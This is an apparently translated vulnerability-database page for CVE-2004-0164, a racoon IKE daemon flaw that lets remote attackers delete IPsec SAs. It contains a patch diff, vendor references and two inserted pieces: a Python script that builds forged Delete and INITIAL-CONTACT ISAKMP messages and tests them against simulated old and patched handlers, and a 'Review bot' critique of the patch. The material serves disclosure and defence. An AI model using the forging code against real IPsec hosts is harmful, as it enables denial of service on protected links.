CVE-2004-0164
CVSS 5.0
Published: 2004-03-03 00:00:00
Last modified: 2016-10-17 22:41:22

[Original text] KAME IKE daemon (racoon) does not properly handle hash values, which allows remote attackers to delete certificates via (1) a certain delete message that is not properly handled in isakmp.c or isakmp_inf.c, or (2) a certain INITIAL-CONTACT message that is not properly handled in isakmp_inf.c.


[CNNVD] KAME Racoon Malformed Message SA Deletion Vulnerability (CNNVD-200403-048)

        
        racoon is KAME's IKE daemon.
        racoon has a security flaw that lets a remote attacker delete IPsec SAs without authorization.
        When racoon receives a delete message carrying the initiator cookie of a main/aggressive/base mode exchange that has not yet established an ISAKMP security association (SA), the attacker can delete all IPsec (and ISAKMP) SAs without authorization.
        Likewise, an INITIAL-CONTACT request message sent without a Hash payload deletes all IPsec SAs associated with the destination address.
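The two attacks described above, and the checks that stop them, as an added example that is not code from the page, from KAME or from the advisory: the script below builds ISAKMP Informational messages carrying either a Delete payload or an INITIAL-CONTACT Notify, then runs each through a handler that mirrors the pre-patch racoon behaviour (a HASH payload is skipped if present and never verified) and one that mirrors the patched checks (HASH payload required, the ISAKMP-SA for the cookie pair must be established, and HASH(1) = prf(SKEYID_a, M-ID | N/D) must verify). The prf (HMAC-SHA1), the SKEYID_a value, the cookies and the ESP SPI are all constructed assumptions, and the separate encryption requirement racoon enforces is left out.

```python
import hashlib
import hmac
import struct

ISAKMP_HDR_LEN = 28  # RFC 2408 header; payload and notify numbers from RFC 2407/2408/2409
NPTYPE_NONE, NPTYPE_HASH, NPTYPE_NOTIFY, NPTYPE_DELETE = 0, 8, 11, 12
EXCH_INFORMATIONAL, DOI_IPSEC, PROTO_ISAKMP, PROTO_IPSEC_ESP = 5, 1, 1, 3
NOTIFY_INITIAL_CONTACT = 24576

def gen_payload(next_np, body):
    """Generic payload: next-payload, reserved, length in network order including this 4-byte header."""
    return struct.pack("!BBH", next_np, 0, 4 + len(body)) + body

def delete_payload(proto, spis):
    """Delete payload: DOI, protocol, SPI size, SPI count, SPIs."""
    return gen_payload(NPTYPE_NONE, struct.pack("!IBBH", DOI_IPSEC, proto, len(spis[0]), len(spis)) + b"".join(spis))

def initial_contact_payload(icookie, rcookie):
    """Notify payload carrying INITIAL-CONTACT; for protocol ISAKMP the SPI is the cookie pair."""
    return gen_payload(NPTYPE_NONE, struct.pack("!IBBH", DOI_IPSEC, PROTO_ISAKMP, 16, NOTIFY_INITIAL_CONTACT)
                       + icookie + rcookie)

def hash1(skeyid_a, msgid, n_or_d):
    """HASH(1) = prf(SKEYID_a, M-ID | N/D), RFC 2409 5.7; HMAC-SHA1 is assumed as the prf."""
    return hmac.new(skeyid_a, struct.pack("!I", msgid) + n_or_d, hashlib.sha1).digest()

def build_informational(icookie, rcookie, msgid, ptype, payload, skeyid_a=None):
    """Informational exchange: unauthenticated if skeyid_a is None, HASH-protected otherwise."""
    if skeyid_a is None:
        first_np, body = ptype, payload
    else:
        first_np, body = NPTYPE_HASH, gen_payload(ptype, hash1(skeyid_a, msgid, payload)) + payload
    hdr = struct.pack("!8s8sBBBBII", icookie, rcookie, first_np, 0x10, EXCH_INFORMATIONAL, 0, msgid,
                      ISAKMP_HDR_LEN + len(body))
    return hdr + body

def parse(msg):
    """Walk the payload chain with bounds checks; returns header fields and (type, offset, body) tuples."""
    if len(msg) < ISAKMP_HDR_LEN:
        raise ValueError("short ISAKMP header")
    ic, rc, np, _ver, exch, _flags, msgid, length = struct.unpack("!8s8sBBBBII", msg[:ISAKMP_HDR_LEN])
    if length != len(msg):
        raise ValueError("header length does not match datagram")
    payloads, off = [], ISAKMP_HDR_LEN
    while np != NPTYPE_NONE:
        if off + 4 > len(msg):
            raise ValueError("truncated payload header")
        nxt, _res, plen = struct.unpack("!BBH", msg[off:off + 4])
        if plen < 4 or off + plen > len(msg):
            raise ValueError("payload length points outside the message")
        payloads.append((np, off, msg[off + 4:off + plen]))
        np, off = nxt, off + plen
    return {"cookies": (ic, rc), "exch": exch, "msgid": msgid, "payloads": payloads}

def requested_actions(payloads):
    """What the message asks for: tear down SAs (Delete) or drop all state for the peer (INITIAL-CONTACT)."""
    return [("delete-sa" if t == NPTYPE_DELETE else "initial-contact") for t, _o, b in payloads
            if t == NPTYPE_DELETE or (t == NPTYPE_NOTIFY and b[6:8] == struct.pack("!H", NOTIFY_INITIAL_CONTACT))]

def handle_pre_patch(msg, phase1_table):
    """Removed racoon logic: skip a HASH payload if present, otherwise act on the message as-is."""
    payloads = parse(msg)["payloads"]
    if payloads and payloads[0][0] == NPTYPE_HASH:
        payloads = payloads[1:]  # present but never verified; phase1_table is never consulted
    return ("accepted", requested_actions(payloads))

def handle_post_patch(msg, phase1_table):
    """Patched logic: HASH payload required, ISAKMP-SA must be established, HASH(1) must verify."""
    p = parse(msg)
    if not p["payloads"] or p["payloads"][0][0] != NPTYPE_HASH:
        return ("rejected: no hash payload", [])
    ph1 = phase1_table.get(p["cookies"])
    if ph1 is None or not ph1["established"]:
        return ("rejected: ISAKMP-SA not established", [])
    _t, hoff, hbody = p["payloads"][0]
    n_or_d = msg[hoff + 4 + len(hbody):]  # everything after the HASH payload
    if not hmac.compare_digest(hbody, hash1(ph1["skeyid_a"], p["msgid"], n_or_d)):
        return ("rejected: hash mismatch", [])
    return ("accepted", requested_actions(p["payloads"][1:]))

def demo():
    """Constructed scenario: one established ISAKMP-SA, one still in main mode, an attacker knowing both cookie pairs."""
    ic_est, rc_est, key_est = b"\x11" * 8, b"\x22" * 8, b"constructed-SKEYID_a"
    ic_new, rc_new = b"\x33" * 8, b"\x44" * 8
    table = {(ic_est, rc_est): {"established": True, "skeyid_a": key_est},
             (ic_new, rc_new): {"established": False, "skeyid_a": None}}
    esp_del = delete_payload(PROTO_IPSEC_ESP, [b"\xde\xad\xbe\xef"])
    msgs = {
        "forged_delete": build_informational(ic_new, rc_new, 0x1001, NPTYPE_DELETE, esp_del),
        "forged_initial_contact": build_informational(ic_est, rc_est, 0x1002, NPTYPE_NOTIFY,
                                                      initial_contact_payload(ic_est, rc_est)),
        "half_open_with_hash": build_informational(ic_new, rc_new, 0x1003, NPTYPE_DELETE, esp_del, b"guess"),
        "bad_hash": build_informational(ic_est, rc_est, 0x1004, NPTYPE_DELETE, esp_del, b"guess"),
        "genuine": build_informational(ic_est, rc_est, 0x1005, NPTYPE_DELETE, esp_del, key_est),
    }
    return {name: (handle_pre_patch(m, table), handle_post_patch(m, table)) for name, m in msgs.items()}

if __name__ == "__main__":
    print(*(f"{n}: pre-patch={a} post-patch={b}" for n, (a, b) in demo().items()), sep="\n")
```

Run directly, the script prints that the pre-patch handler acts on every message, including the two with no HASH payload at all, while the patched handler acts only on the message carrying a valid HASH(1) under the established SA's SKEYID_a. The same parser, fed the UDP/500 payloads from a capture, flags Informational exchanges whose first payload is not HASH, which is the wire signature of the forged messages this advisory describes.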
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9737 KAME IKE daemon (racoon) does not properly handle hash values, which allows remote attackers to delete certificates via (1) a certain delete...
oval:org.mitre.oval:def:947 KAME IKE Daemon Improper Hash Value Handling
*The OVAL definitions describe in detail how to detect this vulnerability; see the linked OVAL definitions for more technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0164
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0164
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-048
(official data source) CNNVD

- Other links and resources

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2004-001.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2004-001
http://lists.apple.com/archives/security-announce/2004/Feb/msg00000.html
(UNKNOWN)  APPLE  APPLE-SA-2004-02-23
http://marc.info/?l=bugtraq&m=107403331309838&w=2
(UNKNOWN)  BUGTRAQ  20040113 unauthorized deletion of IPsec (and ISAKMP) SAs in racoon
http://marc.info/?l=bugtraq&m=107411758202662&w=2
(UNKNOWN)  BUGTRAQ  20040114 Re: unauthorized deletion of IPsec (and ISAKMP) SAs in racoon
http://www.securityfocus.com/bid/9416
(UNKNOWN)  BID  9416
http://www.securityfocus.com/bid/9417
(UNKNOWN)  BID  9417
http://xforce.iss.net/xforce/xfdb/14117
(VENDOR_ADVISORY)  XF  openbsd-isakmp-invalidspi-delete-sa(14117)
http://xforce.iss.net/xforce/xfdb/14118
(UNKNOWN)  XF  openbsd-isakmp-initialcontact-delete-sa(14118)

- Vulnerability information

KAME Racoon Malformed Message SA Deletion Vulnerability
Medium severity, access validation error
2004-03-03 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * The IIJ SEIL team provides the following patch:
        Index: isakmp_inf.c
        ===================================================================
        RCS file: /cvsroot/kame/kame/kame/kame/racoon/isakmp_inf.c,v
        retrieving revision 1.82
        diff -u -r1.82 isakmp_inf.c
        --- isakmp_inf.c 13 Nov 2003 02:30:20 -0000 1.82
        +++ isakmp_inf.c 14 Jan 2004 09:14:31 -0000
        @@ -136,10 +136,81 @@
        
         isakmp = (struct isakmp *)msg->v;
         gen = (struct isakmp_gen *)((caddr_t)isakmp + sizeof(struct isakmp));
        - if (isakmp->np == ISAKMP_NPTYPE_HASH)
        - np = gen->np;
        - else
        - np = isakmp->np;
        +
        + if (isakmp->np != ISAKMP_NPTYPE_HASH) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information because the message has no hash payload.\n");
        + goto end;
        + }
        +
        + if (iph1->status != PHASE1ST_ESTABLISHED) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information because ISAKMP-SA has not been established yet.\n");
        + goto end;
        + }
        +
        + np = gen->np;
        +
        + {
        + void *p;
        + vchar_t *hash, *payload;
        + struct isakmp_gen *nd;
        +
        + /*
        + * XXX: gen->len includes isakmp header length
        + */
        + p = (caddr_t) gen + sizeof(struct isakmp_gen);
        + nd = (struct isakmp_gen *) ((caddr_t) gen + gen->len);
        +
        + /* nd length check */
        + if (nd->len > msg->l - (sizeof(struct isakmp) + gen->len)) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "too long payload length (broken message?)\n");
        + goto end;
        + }
        +
        + payload = vmalloc(nd->len);
        + if (payload == NULL) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "cannot allocate memory\n");
        + goto end;
        + }
        +
        + memcpy(payload->v, (caddr_t) nd, nd->len);
        +
        + /* compute HASH */
        + hash = oakley_compute_hash1(iph1, isakmp->msgid, payload);
        + if (hash == NULL) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "cannot compute hash\n");
        +
        + vfree(payload);
        + goto end;
        + }
        +
        + if (gen->len - sizeof(struct isakmp_gen) != hash->l) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information due to hash length mismatch\n");
        +
        + vfree(hash);
        + vfree(payload);
        + goto end;
        + }
        +
        + if (memcmp(p, hash->v, hash->l) != 0) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information due to hash mismatch\n");
        +
        + vfree(hash);
        + vfree(payload);
        + goto end;
        + }
        +
        + plog(LLV_DEBUG, LOCATION, NULL, "hash validated.\n");
        +
        + vfree(hash);
        + vfree(payload);
        + }
        
         /* make sure the packet were encrypted. */
         if (!encrypted) {
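Review bot: in the new block, `nd` is dereferenced (`nd->len`) before anything checks that `gen + gen->len + sizeof(struct isakmp_gen)` still lies inside `msg`, and the guard `nd->len > msg->l - (sizeof(struct isakmp) + gen->len)` wraps around (unsigned subtraction) when `gen->len` is larger than `msg->l - sizeof(struct isakmp)`, so an oversized HASH payload length sends both the `nd->len` read and the `memcpy(payload->v, (caddr_t) nd, nd->len)` past the end of the datagram. Add a check such as `if (gen->len < sizeof(*gen) || sizeof(struct isakmp) + gen->len + sizeof(*nd) > msg->l) goto end;` before `nd` is computed. Two smaller points: `gen->len` and `nd->len` are used raw here while ISAKMP payload lengths are carried in network byte order, so confirm they are already in host order at this point (otherwise wrap them in `ntohs()`); and the comment `XXX: gen->len includes isakmp header length` contradicts `nd = (struct isakmp_gen *) ((caddr_t) gen + gen->len)`, which is only right if `gen->len` is the HASH payload's own length, so reword or drop it. The repeated `vfree(hash); vfree(payload);` on each error exit would read cleaner as a single cleanup label, but that is style only.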
        Vendor patch:
        Thomas Walpuski
        ---------------
        The vendor has released an upgrade patch to fix this issue; download it from the vendor's home page:
        
        http://packages.debian.org/unstable/net/racoon.html

- Vulnerability information (23540)

KAME Racoon "Initial Contact" SA Deletion Vulnerability (EDBID:23540)
freebsd dos
2004-01-14 Verified
Thomas Walpuski
source: http://www.securityfocus.com/bid/9417/info

It has been reported that it may be possible for attackers to remotely delete security associations (SAs) in hosts running the KAME IKE daemon Racoon.


- Vulnerability information

3495
KAME Racoon Arbitrary Security Association Deletion

- Description

Racoon contains a flaw that may allow a malicious user to cause a Denial of Service. The issue is triggered when Racoon receives a delete message containing the initiator cookie of a main/aggressive/base mode exchange that has not yet set up an ISAKMP security association. It is possible that the flaw may allow a DoS resulting in a loss of availability.

- Timeline

2004-01-13 2003-08-01
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, KAME has released a patch to address this vulnerability.

- References

- Credit

Unknown or Incomplete

- Vulnerability information

KAME Racoon "Initial Contact" SA Deletion Vulnerability
Access Validation Error 9417
Remote: Yes  Local: No
2004-01-14 12:00:00 2009-07-12 02:06:00
Discovered by Thomas Walpuski <thomas@thinknerd.de>.

- Affected program versions

SGI ProPack 3.0
SCO Unixware 7.1.4
KAME Racoon
+ FreeBSD FreeBSD 4.9
+ NetBSD NetBSD 1.6.1
+ NetBSD NetBSD 1.6

- Discussion

It has been reported that it may be possible for attackers to remotely delete security associations (SAs) in hosts running the KAME IKE daemon Racoon.

- Exploit

Though no exploit code is available, a detailed description of an attack that exploits this vulnerability is included in the message by Thomas Walpuski <thomas@thinknerd.de>. See the reference section.

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

SGI has released an advisory (20040506-01-U) with Patch 10075 for SGI ProPack 3 to address this and other issues. Please see the referenced advisory for more information.

NetBSD has released an advisory that includes updates. Fix details may be found in the attached advisory.

Red Hat has released advisory RHSA-2004:165-09 dealing with this and other issues for their enterprise linux distribution. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

The vendor has released a patch to address this issue.

SCO has released advisory SCOSA-2005.10 to address various issues in Racoon affecting UnixWare 7.1.4. Please see the referenced advisory for more information.

